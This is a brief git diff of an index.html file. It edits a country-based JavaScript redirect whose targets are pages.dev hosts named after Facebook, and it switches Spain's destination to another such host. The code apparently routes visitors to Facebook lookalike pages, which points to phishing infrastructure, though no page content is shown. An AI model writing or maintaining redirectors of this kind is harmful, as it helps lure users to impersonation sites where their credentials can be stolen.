--- a/index.html
+++ b/index.html
@@ -26,7 +26,7 @@
 function redirectURL(country) {
     // Agrega lógica personalizada para redirigir según el país aquí
     if (country === 'ES') {
-        window.location.href = 'https://facebook-c8f.pages.dev/';
+        window.location.href = 'https://facebook1-adw.pages.dev/';
     } else if (country === 'GR') {
         window.location.href = 'https://facebook1-adw.pages.dev/';
     } else if (country === 'HU') {
